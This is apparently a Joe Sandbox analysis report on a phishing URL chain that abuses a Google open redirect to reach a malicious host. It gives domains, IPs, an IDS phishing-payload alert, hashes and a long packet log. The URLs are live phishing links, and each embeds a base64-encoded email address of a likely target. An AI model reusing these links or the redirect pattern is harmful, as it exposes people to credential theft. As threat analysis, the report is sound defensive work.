              https://www.google.dz/amp/s/handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82false
                high
                https://www.google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Fhandlingservice.com.br%2Fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82false
                  high
                  https://handlingservice.com.br/favicon.icofalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cjcjjdkdkfkfje.gharelokhana.com/?km=YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%C3%A3%C2%80%C2%82$$$%C3%A3%C2%80%C2%82true
                  • Avira URL Cloud: safe
                  unknown
                  https://handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82false
                    unknown
                    https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82false
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      191.252.162.52
                      handlingservice.com.brBrazil
                      27715LocawebServicosdeInternetSABRfalse
                      172.217.171.195
                      www.google.dzUnited States
                      15169GOOGLEUSfalse
                      239.255.255.250
                      unknownReserved
                      unknownunknownfalse
                      142.251.37.195
                      google.dzUnited States
                      15169GOOGLEUSfalse
                      164.92.191.86
                      cjcjjdkdkfkfje.gharelokhana.comUnited States
                      46930ASN-DPSDUStrue
                      142.250.181.100
                      www.google.comUnited States
                      15169GOOGLEUSfalse
                      IP
                      192.168.2.6
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1567652
                      Start date and time:2024-12-03 17:50:26 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 54s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==。$$$。
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal52.win@18/2@12/7
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.210.172, 172.217.19.227, 74.125.205.84, 172.217.19.238, 34.104.35.123, 172.217.17.67
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, ocsp.edge.digicert.com, update.googleapis.com, clients.l.google.com
                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: https://google.dz/url?q=lbjaqJLi6z3yh&amp;rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&amp;sa=t&amp;url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82
                      No simulations
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text
                      Category:downloaded
                      Size (bytes):315
                      Entropy (8bit):5.0572271090563765
                      Encrypted:false
                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                      Malicious:false
                      Reputation:low
                      URL:https://handlingservice.com.br/favicon.ico
                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                      No static file info

                      Download Network PCAP: filteredfull

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-12-03T17:51:44.441178+01002857090ETPRO PHISHING JS/PsyduckPockeball Payload Inbound1164.92.191.86443192.168.2.649762TCP
                      • Total Packets: 1609
                      • 443 (HTTPS)
                      • 53 (DNS)
                      TimestampSource PortDest PortSource IPDest IP
                      Dec 3, 2024 17:51:11.995410919 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:11.995528936 CET49705443192.168.2.620.190.147.10
                      Dec 3, 2024 17:51:12.011524916 CET49705443192.168.2.620.190.147.10
                      Dec 3, 2024 17:51:12.011540890 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:12.011866093 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:12.012196064 CET49705443192.168.2.620.190.147.10
                      Dec 3, 2024 17:51:12.012247086 CET49705443192.168.2.620.190.147.10
                      Dec 3, 2024 17:51:12.012269020 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:12.674103975 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:12.674138069 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:12.674174070 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:12.674221992 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:12.674271107 CET49705443192.168.2.620.190.147.10
                      Dec 3, 2024 17:51:12.674290895 CET49705443192.168.2.620.190.147.10
                      Dec 3, 2024 17:51:12.675066948 CET49705443192.168.2.620.190.147.10
                      Dec 3, 2024 17:51:12.675080061 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:12.675097942 CET49705443192.168.2.620.190.147.10
                      Dec 3, 2024 17:51:12.675102949 CET4434970520.190.147.10192.168.2.6
                      Dec 3, 2024 17:51:13.131634951 CET4434970620.198.118.190192.168.2.6
                      Dec 3, 2024 17:51:13.131875038 CET49706443192.168.2.620.198.118.190
                      Dec 3, 2024 17:51:13.137065887 CET49706443192.168.2.620.198.118.190
                      Dec 3, 2024 17:51:13.137077093 CET4434970620.198.118.190192.168.2.6
                      Dec 3, 2024 17:51:13.137335062 CET4434970620.198.118.190192.168.2.6
                      Dec 3, 2024 17:51:13.138529062 CET49706443192.168.2.620.198.118.190
                      Dec 3, 2024 17:51:13.138613939 CET49706443192.168.2.620.198.118.190
                      Dec 3, 2024 17:51:13.138618946 CET4434970620.198.118.190192.168.2.6
                      Dec 3, 2024 17:51:13.138729095 CET49706443192.168.2.620.198.118.190
                      Dec 3, 2024 17:51:13.183320045 CET4434970620.198.118.190192.168.2.6
                      Dec 3, 2024 17:51:13.693387985 CET4434970620.198.118.190192.168.2.6
                      Dec 3, 2024 17:51:13.693696022 CET4434970620.198.118.190192.168.2.6
                      Dec 3, 2024 17:51:13.693752050 CET49706443192.168.2.620.198.118.190
                      Dec 3, 2024 17:51:13.693866014 CET49706443192.168.2.620.198.118.190
                      Dec 3, 2024 17:51:13.693886995 CET4434970620.198.118.190192.168.2.6
                      Dec 3, 2024 17:51:13.693897009 CET49706443192.168.2.620.198.118.190
                      Dec 3, 2024 17:51:15.242259026 CET49673443192.168.2.6173.222.162.64
                      Dec 3, 2024 17:51:15.242260933 CET49674443192.168.2.6173.222.162.64
                      Dec 3, 2024 17:51:15.539078951 CET49672443192.168.2.6173.222.162.64
                      Dec 3, 2024 17:51:21.499139071 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:21.499195099 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:21.499268055 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:21.499979973 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:21.499996901 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:22.072814941 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:22.072854042 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:22.072952986 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:22.073760033 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:22.073772907 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:23.984215975 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:23.984298944 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:23.988121033 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:23.988138914 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:23.988370895 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:23.990437984 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:23.990540981 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:23.990550995 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:23.990677118 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.035327911 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.296582937 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.296669006 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.298440933 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.298448086 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.298652887 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.300084114 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.300152063 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.300156116 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.300261974 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.347333908 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.532341003 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.532499075 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.532562017 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.532620907 CET49716443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.532636881 CET4434971620.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.710249901 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:24.710274935 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:24.710697889 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:24.711025000 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:24.711035013 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:24.850337029 CET49673443192.168.2.6173.222.162.64
                      Dec 3, 2024 17:51:24.850361109 CET49674443192.168.2.6173.222.162.64
                      Dec 3, 2024 17:51:24.968271971 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.968368053 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:24.968482018 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.968780994 CET49717443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:24.968801975 CET4434971720.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:25.147208929 CET49672443192.168.2.6173.222.162.64
                      Dec 3, 2024 17:51:25.423590899 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:25.423645973 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:25.423795938 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:25.424135923 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:25.424149036 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:25.769310951 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:25.769345045 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:25.769530058 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:25.771250963 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:25.771266937 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:26.479599953 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:26.479898930 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:26.479912043 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:26.480983019 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:26.481045008 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:26.482675076 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:26.482733965 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:26.522217035 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:26.522226095 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:26.564294100 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:27.007524014 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:27.007571936 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:27.007697105 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:27.008690119 CET49723443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:27.008724928 CET44349723142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:27.008846998 CET49723443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:27.009223938 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:27.009238958 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:27.009669065 CET49723443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:27.009677887 CET44349723142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:27.254405975 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.254502058 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.261207104 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.261239052 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.261465073 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.282320976 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.282422066 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:27.284084082 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:27.284091949 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.284328938 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.296669960 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:27.305700064 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.312017918 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.339334011 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.355335951 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.582926035 CET44349703173.222.162.64192.168.2.6
                      Dec 3, 2024 17:51:27.583023071 CET49703443192.168.2.6173.222.162.64
                      Dec 3, 2024 17:51:27.803066015 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.803097010 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.803106070 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.803113937 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.803165913 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.803184986 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:27.803220034 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.803234100 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:27.803251028 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.803261995 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:27.803776026 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.803776026 CET49721443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.803800106 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.803817034 CET4434972123.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.881879091 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.881925106 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.882128954 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.882699013 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:27.882710934 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:27.986025095 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.986049891 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.986119986 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:27.986156940 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:27.986242056 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.046047926 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.046066999 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.046133995 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.046163082 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.046255112 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.172847033 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.172872066 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.172965050 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.172995090 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.175033092 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.202048063 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.202070951 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.202124119 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.202141047 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.202169895 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.202183962 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.223859072 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.223906040 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.223953962 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.223968029 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.224009991 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.224024057 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.242486954 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.242522001 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.242564917 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.242574930 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.242634058 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.364659071 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.364681959 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.364774942 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.364789963 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.367033005 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.381225109 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.381249905 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.381320953 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.381328106 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.381351948 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.381366968 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.397394896 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.397420883 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.397458076 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.397466898 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.397542000 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.410590887 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.410620928 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.410691977 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.410701036 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.410717010 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.410736084 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.417730093 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.418884039 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.418895006 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.419990063 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.420073032 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.421222925 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.421246052 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.421308041 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.421314955 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.421333075 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.421356916 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.427192926 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.427259922 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.431179047 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.431200981 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.431283951 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.431298018 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.432292938 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.440282106 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.440289021 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.464088917 CET44349723142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.464335918 CET49723443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.464346886 CET44349723142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.465320110 CET44349723142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.465382099 CET49723443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.465725899 CET49723443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.465781927 CET44349723142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.481246948 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.513017893 CET49723443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.513034105 CET44349723142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.559500933 CET49723443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.559664011 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.559734106 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.559736967 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.559782982 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.560129881 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.560156107 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.560169935 CET49720443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.560174942 CET4434972013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.610651970 CET49726443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.610691071 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.610749960 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.610779047 CET49726443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.610789061 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.610835075 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.614181042 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.614195108 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.614346027 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.614494085 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.614500999 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.614571095 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.616642952 CET49729443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.616658926 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.616719961 CET49729443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.617134094 CET49729443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.617145061 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.617439032 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.617451906 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.617536068 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.617546082 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.617618084 CET49726443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.617624998 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.617815971 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:28.617825031 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:28.957623959 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.957792997 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.957989931 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.958067894 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.958090067 CET44349722142.251.37.195192.168.2.6
                      Dec 3, 2024 17:51:28.958102942 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:28.958172083 CET49722443192.168.2.6142.251.37.195
                      Dec 3, 2024 17:51:29.197150946 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:29.197180986 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:29.197268963 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:29.197477102 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:29.197490931 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:29.264070988 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:29.264168024 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:29.265928984 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:29.265938044 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:29.266293049 CET4434972423.218.208.109192.168.2.6
